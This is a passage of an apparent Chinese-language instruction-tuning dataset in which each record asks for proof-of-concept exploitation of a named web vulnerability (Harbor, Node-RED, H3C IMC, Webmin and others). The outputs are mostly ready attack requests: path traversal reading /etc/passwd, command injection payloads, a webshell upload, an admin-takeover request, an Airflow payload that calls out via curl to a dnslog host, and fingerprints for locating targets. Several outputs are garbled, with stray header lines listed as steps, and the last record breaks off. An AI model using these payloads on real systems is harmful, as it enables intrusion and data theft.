  765. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Harbor 公开镜像仓库未授权访问 CVE-2022-46463\n漏洞描述:Harbor 是为企业用户设计的容器镜像仓库开源项目,包括了权限管理 (RBAC)、LDAP、审计、安全漏洞扫描、镜像验真、管理界面、自我注册、HA 等企业必需的功能。Harbor api search 允许未认证的用户搜索仓库内存在的公开仓库,若将私有业务镜像放置于公开仓库,可能存在信息泄漏风险。 此漏洞披露时为未授权漏洞,漏洞影响存在争议。实际上该漏洞是由于安全配置不当,允许任意用户通过 `/api/search?q=` 接口搜索到所有公开仓库,下载公开仓库中的镜像(而非直接访问私有仓库)。但如果将私有业务镜像放置于公开仓库,可能存在信息泄漏风险,相应利用场景: 1. 下载包含敏感环境的公开镜像; 2. 分析镜像,发现服务启动时进行了 jar 文件拷贝操作; 3. 提取 jar 文件,反编译获取配置文件中硬编码的账号密码。 参考链接: - https://mp.weixin.qq.com/s/pBkJW1_Vpf_suH50e8K9kg - https://mp.weixin.qq.com/s/V8Ecqq_DPOQhH5q9UBWkXg - https://github.com/404tk/CVE-2022-46463\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-46463\n【POC利用方法】\n1. GET /api/systeminfo HTTP/1.1   # harbor 1.x\nGET /api/v2.0/systeminfo HTTP/1.1   # harbor 2.x\n2. GET /api/search?q=/ HTTP/1.1\nGET /api/v2.0/search?q=/ HTTP/1.1\n3. GET /api/repositories/<PROJECT_NAME>/<IMAGE_NAME>/tags?detail=1 HTTP/1.1\nGET /api/v2.0/projects/<PROJECT_NAME>/repositories/<IMAGE_NAME>/artifacts?with_tag=true HTTP/1.1\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Harbor 公开镜像仓库未授权访问 CVE-2022-46463.md"}
    766. 

  766. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Node-RED ui_base 任意文件读取漏洞\n漏洞描述:Node-RED 在/nodes/ui_base.js中,URL与'/ui_base/js/*'匹配,然后传递给path.join, 缺乏对最终路径的验证会导致路径遍历漏洞,可以利用这个漏洞读取服务器上的敏感数据,比如settings.js\n影响版本:``` Node-RED ```\n网络测绘:``` title=\"Node-RED\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title=\"Node-RED\"\n2. /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\n/ui_base/js/..%2f..%2f..%2f..%2fsettings.js\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Node-RED ui_base 任意文件读取漏洞.md"}
    767. 

  767. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:中远麒麟 iAudit堡垒机 get_luser_by_sshport.php 远程命令执行漏洞\n漏洞描述:中远麒麟 iAudit堡垒机 get_luser_by_sshport.php文件存在命令拼接,攻击者通过漏洞可获取服务器权限\n影响版本:``` 中远麒麟 iAudit堡垒机 ```\n网络测绘:``` cert.subject=\"Baolei\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 中远麒麟 iAudit堡垒机\n2. cert.subject=\"Baolei\"\n3. <?php\ndefine('CAN_RUN', 1);\nrequire_once('include/global.func.php');\nrequire_once('include/db_connect.inc.php');\nif(empty($_GET['clientip'])){\n\techo 'no host';\n\treturn;\n}\nif(empty($_GET['clientport'])){\n\techo 'no port';\n\treturn;\n}\n$cmd = 'sudo perl test.pl '.$_GET['clientip'].' '.$_GET['clientport'];\nexec($cmd, $o, $r);\n $sql = \"SELECT luser FROM sessions WHERE addr='\".$_GET['clientip'].\"' and pid='\".$o[0].\"' order by sid desc limit 1\";\n$rs = mysql_query($sql);\n$row = mysql_fetch_array($rs);\necho $row['luser'];\n?>\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/中远麒麟 iAudit堡垒机 get_luser_by_sshport.php 远程命令执行漏洞.md"}
    768. 

  768. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞\n漏洞描述:银达汇智 智慧综合管理平台 FileDownLoad.aspx 存在任意文件读取漏洞,通过漏洞攻击者可下载服务器中的任意文件\n影响版本:``` 银达汇智 智慧综合管理平台 ```\n网络测绘:``` \"汇智信息\" && title=\"智慧综合管理平台登入\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 银达汇智 智慧综合管理平台\n2. \"汇智信息\" && title=\"智慧综合管理平台登入\"\n3. /Module/FileManagement/FileDownLoad.aspx?filePath=../../web.config\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞.md"}
    769. 

  769. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:H3C IMC dynamiccontent.properties.xhtm 远程命令执行\n漏洞描述:H3C IMC dynamiccontent.properties.xhtm 存在远程命令执行,攻击者通过构造特殊的请求造成远程命令执行\n影响版本:``` H3C IMC ```\n网络测绘:``` \"/imc/login.jsf\" && body=\"/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. \"/imc/login.jsf\" && body=\"/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui\"\n2. POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1\nHost: \nConnection: close\nCache-Control: max-age=0\nsec-ch-ua: \"Chromium\";v=\"88\", \"Google Chrome\";v=\"88\", \";Not A Brand\";v=\"99\"\nsec-ch-ua-mobile: ?0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: none\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8\nCookie: oam.Flash.RENDERMAP.TOKEN=jw7ysel68; JSESSIONID=EB4E60FA4F333FF21B488E9937B4C739; currentThemeName=imc-new-webui\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 1564\n\npfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami\n3. Connection: close\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/H3C IMC dynamiccontent.properties.xhtm 远程命令执行.md"}
    770. 

  770. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:霆智科技 VA虚拟应用平台 任意文件读取漏洞\n漏洞描述:霆智科技 VA虚拟应用平台 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感信息\n影响版本:霆智科技 VA虚拟应用平台\n网络测绘:``` body=\"EAA益和应用接入系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. body=\"EAA益和应用接入系统\"\n2. /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/霆智科技 VA虚拟应用平台 任意文件读取漏洞.md"}
    771. 

  771. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ntopng权限绕过漏洞 CVE-2021-28073\n漏洞描述:ntopng是监控服务器网络流量的工具,对外提供Web页面。其4.2及以前的版本中存在一处权限绕过漏洞,利用该漏洞可以未授权访问目标任意接口。 参考链接: - http://noahblog.360.cn/ntopng-multiple-vulnerabilities/\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-28073\n【POC利用方法】\n1. docker-compose up -d\n2. python poc.py --url http://your-ip:3000/ baselength\n3. python poc.py --url http://your-ip:3000/ generate -l 36 -p find_prefs.lua\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/ntopng权限绕过漏洞 CVE-2021-28073.md"}
    772. 

  772. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Konga 普通用户越权获取管理员权限漏洞\n漏洞描述:Konga 普通用户通过发送特殊的请求可越权获取管理员权限\n影响版本:``` Konga ```\n网络测绘:``` \"konga\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. PUT /api/user/7 HTTP/1.1\nHost: 127.0.0.1:1337\nAccept: application/json, text/plain, */*\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\nContent-Type: application/json;charset=utf-8\nContent-Length: 241\n\n{\n  \"admin\": true,\n  \"passports\": {\n    \"password\": \"1234abcd\",\n    \"protocol\": \"local\"\n  },\n  \"password_confirmation\": \"1234abcd\",\n  \"token\": \"non-administrator user token\"\n}\n2. Accept: application/json, text/plain, */*\n3. Host: 127.0.0.1:1337\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Konga 普通用户越权获取管理员权限漏洞.md"}
    773. 

  773. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:SonarQube values 信息泄露漏洞 CVE-2020-27986\n漏洞描述:SonarQube 某接口存在信息泄露漏洞,可以获取部分敏感信息\n影响版本:``` SonarQube ```\n网络测绘:``` app=\"sonarQube-代码管理\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-27986\n【POC利用方法】\n1. app=\"sonarQube-代码管理\"\n2. http://xxx.xxx.xxx.xxx/api/settings/values\n3. http://xxx.xxx.xxx.xxx/api/settings/values\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/SonarQube values 信息泄露漏洞 CVE-2020-27986.md"}
    774. 

  774. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:绿盟 SAS堡垒机 local_user.php 任意用户登录漏洞\n漏洞描述:绿盟堡垒机存在任意用户登录漏洞,攻击者通过漏洞包含 www/local_user.php 实现任意⽤户登录\n影响版本:绿盟 SAS堡垒机\n网络测绘:``` body=\"'/needUsbkey.php?username='\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. body=\"'/needUsbkey.php?username='\"\n2. /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/绿盟 SAS堡垒机 local_user.php 任意用户登录漏洞.md"}
    775. 

  775. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:TamronOS IPTV系统 ping 任意命令执行漏洞\n漏洞描述:TamronOS IPTV系统 api/ping 存在任意命令执行漏洞,攻击者通过漏洞可以执行任意命令\n影响版本:``` TamronOS IPTV系统 ```\n网络测绘:``` app=\"TamronOS-IPTV系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. TamronOS IPTV系统\n2. app=\"TamronOS-IPTV系统\"\n3. /api/ping?count=5&host=;id;\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/TamronOS IPTV系统 ping 任意命令执行漏洞.md"}
    776. 

  776. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:EasyImage manager.php 后台任意文件上传漏洞\n漏洞描述:EasyImage manager.php 存在任意文件上传漏洞,攻击者通过漏洞可以上传恶意文件到服务器获取服务器权限\n影响版本:``` EasyImage ```\n网络测绘:``` app=\"EasyImage-简单图床\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"EasyImage-简单图床\"\n2. POST /admin/manager.php?p= HTTP/1.1\nHost: \nAccept: application/json\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nCache-Control: no-cache\nContent-Length: 1622\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryEUCF9Yq83AkaO6sv\nCookie: Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680341989; auth=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22tossone%22%3Bi%3A1%3Bs%3A32%3A%22590368bca375c2f8fe93df7d253481e8%22%3B%7D; Hm_lpvt_c790ac2bdc2f385757ecd0183206108d=1680342144; filemanager=sdeemhj3b9aeoretftrlijjh25\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36\n\n------WebKitFormBoundaryEUCF9Yq83AkaO6sv\nContent-Disposition: form-data; name=\"dzuuid\"\n\n7e4fad9a-3545-4ed6-b655-b3e3a6b2978c\n------WebKitFormBoundaryEUCF9Yq83AkaO6sv\nContent-Disposition: form-data; name=\"dzchunkindex\"\n\n0\n------WebKitFormBoundaryEUCF9Yq83AkaO6sv\nContent-Disposition: form-data; name=\"dztotalfilesize\"\n\n583\n------WebKitFormBoundaryEUCF9Yq83AkaO6sv\nContent-Disposition: form-data; name=\"dzchunksize\"\n\n10000000\n------WebKitFormBoundaryEUCF9Yq83AkaO6sv\nContent-Disposition: form-data; name=\"dztotalchunkcount\"\n\n1\n------WebKitFormBoundaryEUCF9Yq83AkaO6sv\nContent-Disposition: form-data; name=\"dzchunkbyteoffset\"\n\n0\n------WebKitFormBoundaryEUCF9Yq83AkaO6sv\nContent-Disposition: form-data; name=\"p\"\n\n\n------WebKitFormBoundaryEUCF9Yq83AkaO6sv\nContent-Disposition: form-data; name=\"fullpath\"\n\nshell.php\n------WebKitFormBoundaryEUCF9Yq83AkaO6sv\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\nContent-Type: application/octet-stream\n\n234\n\n------WebKitFormBoundaryEUCF9Yq83AkaO6sv--\n3. /i/shell.php\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/EasyImage manager.php 后台任意文件上传漏洞.md"}
    777. 

  777. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:深信服 应用交付管理系统 login 远程命令执行漏洞\n漏洞描述:深信服 应用交付管理系统 login 存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令\n影响版本:深信服 应用交付管理系统 7.0.8-7.0.8R5\n网络测绘:``` fid=\"iaytNA57019/kADk8Nev7g==\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. fid=\"iaytNA57019/kADk8Nev7g==\"\n2. POST /rep/login \n\nclsMode=cls_mode_login%0Als%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123\n3. POST /rep/login\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/深信服 应用交付管理系统 login 远程命令执行漏洞.md"}
    778. 

  778. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ICEFlow VPN 信息泄露漏洞\n漏洞描述:ICEFlow VPN 存在信息泄露漏洞,攻击者可以查看日志中的敏感数据来进一步攻击系统\n影响版本:``` ICEFlow VPN ```\n网络测绘:``` title=\"ICEFLOW VPN Router\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. ICEFlow VPN\n2. title=\"ICEFLOW VPN Router\"\n3. 系统日志    http://url/log/system.log\nVPN日志    http://url/log/vpn.log\n访问日志\thttp://url/log/access.log\n告警日志\thttp://url/log/warn.log\n错误日志\thttp://url/log/error.log\n调试日志\thttp://url/log1/debug.log\n移动用户日志 http://url/log/mobile.log\n防火墙日志\thttp://url/log/firewall.log\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/ICEFlow VPN 信息泄露漏洞.md"}
    779. 

  779. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Gerapy clone 后台远程命令执行漏洞 CVE-2021-32849\n漏洞描述:近日,我司应急团队监测到关于Gerapy 0.9.6和之前的版本中存在注入漏洞,漏洞编号:CVE-2021-32849,该漏洞源于程序没有正确清理通过project_clone端点传递给Popen的输入,攻击者可利用该漏洞执行任意命令。\n影响版本:``` Gerapy <= 0.9.6 ```\n网络测绘:``` title=\"Gerapy\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-32849\n【POC利用方法】\n1. Gerapy <= 0.9.6\n2. title=\"Gerapy\"\n3. @api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef project_clone(request):\n    \"\"\"\n    clone project from github\n    :param request: request object\n    :return: json\n    \"\"\"\n    if request.method == 'POST':\n        data = json.loads(request.body)\n        address = data.get('address')\n        if not address.startswith('http'):\n            return JsonResponse({'status': False})\n        address = address + '.git' if not address.endswith('.git') else address\n        cmd = 'git clone {address} {target}'.format(address=address, target=join(PROJECTS_FOLDER, Path(address).stem))\n        logger.debug('clone cmd %s', mcd)\n        p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)\n        stdout, stderr = bytes2str(p.stdout.read()), bytes2str(p.stderr.read())\n        logger.debug('clone run result %s', stdout)\n        if stderr: logger.error(stderr)\n        return JsonResponse({'status': True}) if not stderr else JsonResponse({'status': False})\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Gerapy clone 后台远程命令执行漏洞 CVE-2021-32849.md"}
    780. 

  780. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:科达 网络键盘控制台 任意文件读取漏洞\n漏洞描述:KEDACOM 网络键盘控制台存在任意文件读取漏洞,攻击这通过漏洞可以读取服务器任意信息\n影响版本:``` KEDACOM 网络键盘控制台 ```\n网络测绘:``` \"网络键盘控制台\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. KEDACOM 网络键盘控制台\n2. /../../../../../../../../etc/passwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/科达 网络键盘控制台 任意文件读取漏洞.md"}
    781. 

  781. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:蓝海卓越计费管理系统 download.php 任意文件读取漏洞\n漏洞描述:蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件\n影响版本:``` 蓝海卓越计费管理系统 ```\n网络测绘:``` title==\"蓝海卓越计费管理系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title==\"蓝海卓越计费管理系统\"\n2. GET /download.php?file=../../../../../etc/passwd HTTP/1.1\nHost: \nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nCookie: PHPSESSID=qkoqsiilc4dol8s4e9d7ta15g7; mylang=zh_s\n\nConnection: close\n3. Cache-Control: max-age=0\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/蓝海卓越计费管理系统 download.php 任意文件读取漏洞.md"}
    782. 

  782. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Airflow 远程代码执行漏洞 CVE-2022-40127\n漏洞描述:Apache Airflow 是一个可编程,调度和监控的工作流平台,基于有向无环图(DAG),Airflow 可以定义一组有依赖的任务,按照依赖依次执行。 当攻击者可访问到 Apache Airflow 的后台,且环境中存在默认 Example Dags,则可构造恶意请求借助 run_id 执行任意命令。\n影响版本:``` Airflow < 2.4.0 ```\n网络测绘:``` app=\"APACHE-Airflow\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-40127\n【POC利用方法】\n1. Airflow < 2.4.0\n2. app=\"APACHE-Airflow\"\n3. {\"lab\":\"\\\";curl `uname`.****.dnslog.pw;\\\"\"}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Apache Airflow 远程代码执行漏洞 CVE-2022-40127.md"}
    783. 

  783. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:AVEVA InTouch安全网关 AccessAnywhere 任意文件读取漏洞 CVE-2022-23854\n漏洞描述:AVEVA InTouch Access Anywhere Secure Gateway 2020 R2及以前的版本存在路径遍历漏洞,未授权的攻击者可利用该漏洞获取服务器敏感信息。\n影响版本:``` AVEVA InTouch安全网关 ```\n网络测绘:``` body=\"InTouch Access Anywhere\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-23854\n【POC利用方法】\n1. AVEVA InTouch安全网关\n2. body=\"InTouch Access Anywhere\"\n3. /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/AVEVA InTouch安全网关 AccessAnywhere 任意文件读取漏洞 CVE-2022-23854.md"}
    784. 

  784. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:CloudPanel makefile 任意文件上传漏洞 CVE-2023-35885\n漏洞描述:CloudPanel是一个免费的基于PHP的高性能服务器控制面板,具有轻量级组件和现代功能,易于使用,且支持多个PHP版本,提供多语言版本切换。 CloudPanel makefile 接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。\n影响版本:cloudpanel 2.0.0 >= 2.3.0\n网络测绘:``` title==\"CloudPanel | Log In\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-35885\n【POC利用方法】\n1. title==\"CloudPanel | Log In\"\n2. POST /file-manager/backend/makefile HTTP/1.1\nHost: \nAccept: */*\nConnection: keep-alive\nCookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=\nContent-Length: 54\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/&name=Test.php\n3. POST /file-manager/backend/text HTTP/1.1\nHost: \nAccept: */*\nConnection: keep-alive\nCookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=\nContent-Length: 289\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/Test.php&content=<?php phpinfo()?>\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/CloudPanel makefile 任意文件上传漏洞 CVE-2023-35885.md"}
    785. 

  785. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:思迪数据 Home 登录绕过漏洞\n漏洞描述:思迪数据存在登录绕过漏洞,通过访问特殊路径即可获取后台权限\n影响版本:``` 思迪数据 ```\n网络测绘:``` \"思迪数据\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. http://xxx.xxx.xxx.xxx/Home\n2. http://xxx.xxx.xxx.xxx/Home\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/思迪数据 Home 登录绕过漏洞.md"}
    786. 

  786. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Webmin 远程命令执行漏洞 CVE-2019-15107\n漏洞描述:Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。 参考链接: - https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html - https://www.exploit-db.com/exploits/47230 - https://blog.firosolutions.com/exploits/webmin/\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2019-15107\n【POC利用方法】\n1. docker-compose up -d\n2. POST /password_change.cgi HTTP/1.1\nHost: your-ip:10000\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nCookie: redirect=1; testing=1; sid=x; sessiontest=1\nReferer: https://your-ip:10000/session_login.cgi\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 